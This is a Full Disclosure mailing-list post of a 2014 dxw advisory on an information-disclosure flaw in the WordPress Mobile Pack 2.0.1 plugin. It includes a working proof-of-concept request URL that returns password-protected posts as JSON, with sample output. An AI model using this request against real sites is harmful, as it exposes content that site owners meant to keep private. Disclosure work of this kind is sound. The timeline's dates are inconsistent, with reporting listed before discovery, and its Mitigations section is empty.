[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password p
From: dxw Security <security () dxw ! com>
Date: 2014-08-20 10:31:31
Message-ID: 2e7429c47c3828fba573d467076fe39d () security ! dxw ! com
[Download RAW message or body]
Details
================
Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)
Description
================
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password \
protected posts
Vulnerability
================
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise \
– to read all public and password protected posts (draft and private posts appear not to be \
affected).
Proof of concept
================
Create a password-protected post
Enable WordPress Mobile Pack
Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
Your password-protected post is now visible to everybody in the form of JSON wrapped in "x()"
Example output:
x (
{
\"articles\": [
{
\"id\": 849,
\"title\": \"Secret post\",
\"timestamp\": 1406231170,
\"author\": \"admin\",
\"date\": \"Thu, Jul 24, 2014, 19:46\",
\"link\": \"http://wp.local/?p=849\",
\"image\": \"\",
\"description\": \"<p>HUSH THIS IS A SECRET</p>n\",
\"content\": \"\",
\"category_id\": 1,
\"category_name\": \"Uncategorized\"
}
]
}
)
Mitigations
================
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: \
https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third \
party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your \
behalf.
This vulnerability will be published if we do not receive a response to this report with 14 \
days.
Timeline
================
2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic